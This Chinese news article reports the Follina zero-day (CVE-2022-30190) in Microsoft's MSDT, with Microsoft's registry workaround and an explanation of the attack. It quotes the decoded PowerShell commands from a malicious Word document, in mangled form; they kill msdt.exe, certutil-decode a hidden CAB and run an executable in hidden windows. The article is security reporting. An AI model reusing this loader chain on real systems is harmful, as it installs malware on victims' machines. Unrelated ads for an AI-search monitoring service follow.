首页 > 业界 > 关键词  > base64最新资讯  > 正文

专家发现高危代码执行零日漏洞 所有支持Windows版本均受影响

2022-06-01 08:38 · 稿源: cnbeta

安全专家近日发现了高危的代码执行零日漏洞,目前所有支持的 Windows 系统均受影响。已经有相关证据表明至少在 7 周前就有黑客利用该漏洞,在不触发 Windows Defender 以及其他终端保护产品的情况下,在受害者设备上安装恶意程序。

Shadow Chaser Group 的研究人员在 Twitter 上表示,这个存在于 Microsoft Support Diagnostic Tool 中的漏洞已经于 4 月 12 日报告给微软,并已经证明该漏洞已经被黑客利用进行攻击。

不过给该研究人员的回复中,微软安全响应中心团队并未将报告的行为视为安全漏洞,因为据推测,MSDT 诊断工具在执行有效负载之前需要密码。

不过本周一,微软改变了口风,将该漏洞标识为 CVE-2022-30190,并将其描述为“关键”(critical)漏洞。

在公告中写道:“当从 Word 等调用应用程序使用 URL 协议调用 MSDT 时,存在远程代码执行漏洞。成功利用此漏洞的攻击者可以使用调用应用程序的权限运行任意代码。然后攻击者可以安装程序、查看、更改或删除数据,或者在用户权限允许的上下文中创建新帐户”。

在本文发表时,微软尚未发布补丁。相反,它建议客户通过以下方式禁用 MSDT URL 协议:

1. 以管理员身份运行命令提示符。

2. 要备份注册表项,请执行命令“reg export HKEY_CLASSES_ROOTms-msdt filename”

3. 执行命令“reg delete HKEY_CLASSES_ROOTms-msdt /f”

虽然最初被微软遗漏了,但当研究人员发现周五上传到 VirusTotal 的 Word 文档利用了以前未知的攻击媒介时,该漏洞再次被发现。

根据研究员 Kevin Beaumont 的分析,该文档使用 Word 从远程 Web 服务器检索 HTML 文件。然后,该文档使用 MSProtocol URI 方案来加载和执行 PowerShell 命令。

虽然在理论上这不太可能实现,但事实上确实是可以的。当文档中的命令被解码时,它们会转换为:

$cmd ="c:Windowssystem32cmd.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList"/c taskkill /f /im msdt.exe";

Start-Process $cmd -windowstyle hidden -ArgumentList"/c cd C:userspublicfor /r

%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /yfindstr TVNDRgAAAA 1.rar1.tcertutil -decode 1.t 1.c expand 1.c -F:* .rgb.exe";

根据 Huntress 的解释,该脚本实现的操作为

在隐藏窗口运行以下操作

1. 如果 msdt.exe 正在运行,则终止它

2. 循环遍历 RAR 文件中的文件,查找编码 CAB 文件的 Base64 字符串

3. 将此 Base64 编码的 CAB 文件存储为 1.t

4. 解码Base64编码的CAB文件保存为1.c

5. 将1.c CAB文件展开到当前目录,最后:

6. 执行rgb.exe(大概压缩在1.c CAB文件里面)

举报

  • 相关推荐
  • GEO时代的品牌增长密码:用AIBase解锁AI搜索可见性的「显微镜视角」

    随着用户习惯向AI助手直接提问,品牌竞争已从传统搜索引擎转向AI生成答案的“主动提及率”。生成式AI驱动的搜索变革催生了GEO(生成引擎优化)新赛道——谁能被AI精准记住并优先推荐,谁就能抢占用户心智。文章提出通过AIBase的监控服务量化品牌在AI生态中的表现,并给出“添加-分析-优化”三步实操路径,帮助品牌实现从“被搜索”到“被推荐”的升级。

  • GEO品牌监控实战:教你用AIBase实现全自动AI搜索可见性监控流程

    文章探讨AI时代品牌在ChatGPT等平台可见度的重要性。某SaaS品牌发现其产品从推荐列表中消失,凸显品牌在AI生态中可见度变化难以察觉。数据显示71%美国用户用AI研究品牌,而LLM每次仅引用2-7个域名。建议通过三个维度监控品牌引用:推荐场景、频率排名、竞品对比。提出建立监控体系,重点关注推荐型、对比型、场景型问题,使用AIBase等工具覆盖国内主流平台,持续优化内容形成闭环,确保品牌在AI推荐中保持竞争力。

  • AI搜索时代,品牌流量被“隐形”?AIBase让你精准掌控品牌AI搜索监控

    随着用户习惯向豆包、文心一言等AI助手提问,品牌竞争已从传统搜索引擎转向AI生成答案的“主动提及名单”。AI时代品牌面临三大痛点:内容难被AI推荐、品牌定位被AI误读、竞品提及率远超自身。AIBase推出品牌监控服务,通过全平台覆盖、精准解析品牌画像、GEO指数量化三大核心能力,构建“AI认知透视体系”,帮助品牌实现从“添加-分析-优化”的闭环管理,让复杂AI推荐逻辑变得清晰可操作,成为抢占用户心智的关键工具。

  • ​如何使用 AIBase 平台 GEO 排名查询工具

    本文介绍AI搜索时代品牌面临的新挑战:官网流量被AI工具分流,传统SEO工具无法监测AI平台曝光情况。作者推荐使用AIBase GEO工具,它能监控品牌在豆包、DeepSeek等五大国产AI平台的曝光数据,通过总检测次数、推荐数、曝光数、曝光率四个核心指标量化表现。文章详细演示了设置监控任务、分析数据、针对性优化官网内容的完整流程,强调工具需配合高质量内容持续优化,帮助

  • 别再盯传统SEO了!AIBase GEO监控让品牌在AI搜索里C位出道

    随着AI搜索普及,品牌竞争转向生成引擎优化(GEO)新战场。传统SEO依赖网页排名,但AI模型直接生成答案,导致品牌在AI回答中的曝光陷入盲区。AIBase推出GEO品牌监控工具,实时追踪品牌在主流AI模型的提及情况,提供可见性分析、竞品对比及用户问题挖掘,帮助品牌优化内容策略,提升AI搜索存在感,让AI更倾向主动推荐。

  • GEO优化与AIBase工具指南:抢占AI搜索时代品牌曝光先机

    在AI回答取代点击的时代,你的品牌若未被AI提及,就意味着在数字世界中不复存在。 你是否发现,传统搜索引擎的流量正在下滑?这不是你的错觉,而是用户行为发生了根本性转变:越来越多人不再点击搜索结果,而是直接向ChatGPT、豆包、DeepSeek等AI平台提问,并直接采纳AI给出的答案。 当用户问“推荐一款好用的项目管理软件”时,如果AI没有提及你的品牌,你就失去了一个�

  • GEO时代必备:品牌AI搜索监控实操指南,用AIBase抢占AI可见性高地

    随着生成式AI成为主流信息入口,GEO(生成引擎优化)成为企业品牌曝光的关键。其核心是让品牌信息成为AI生成答案的首选引用源,而品牌AI搜索监控正是落地GEO策略的关键抓手。AIBase平台提供品牌监控服务,帮助企业精准追踪AI搜索可见性、解析GEO指数,实现数据驱动的优化。通过多平台覆盖、核心指标追踪和竞品对标分析,让品牌在AI生态中精准占位,提升权威性与可见性�

  • GEO指数=新SEO排名?AIBase教你如何提升AI搜索品牌可见度

    AI搜索时代,品牌可见性从搜索结果页转向AI回答结果。AIBase的GEO品牌监控工具通过追踪品牌在主流AI模型中的曝光表现,量化AI搜索可见性,帮助品牌优化GEO指数。核心功能包括:监测品牌提及频率与语义倾向、对比竞争对手表现、分析各平台曝光趋势、挖掘用户查询热点。使用流程简单直观,支持品牌实时掌握AI生态中的声量,以数据驱动策略优化,确保在AI搜索时代保持竞争力。

  • AIbase GEO品牌监控服务如何助力品牌赢得AI搜索可见性

    随着生成式AI普及,用户正从传统搜索引擎转向ChatGPT等AI助手提问。品牌可见性不再依赖搜索排名,而取决于AI是否准确提及品牌。但AI模型知识来源不透明,存在品牌被错误引用、替代甚至忽略的风险。AIbase推出的GEO品牌监控服务,通过多平台监测、情感分析、竞品对比等功能,帮助企业实现“可见、可信、可控”的AI声誉管理,用数据驱动品牌在AI搜索时代的战略升级。

  • GEO优化服务哪个平台好?AIBase推出AI搜索引擎优化品牌监控服务

    在AI搜索逐渐成为主流的今天,品牌仅关注传统搜索引擎的排名已经不够了。一个新的概念——GEO,正变得至关重要,它决定了你的品牌是否会被AI助手们主动推荐。 下面我将为你科普什么是GEO,并详细介绍一款能帮你监控品牌在AI世界表现的工具:AIBase的AI搜索引擎优化品牌监控服务。 🔍 什么是GEO? GEO,全称为Generative Engine Optimization,即生成式引擎优化。它的目标和传统的

今日大家都在搜的词: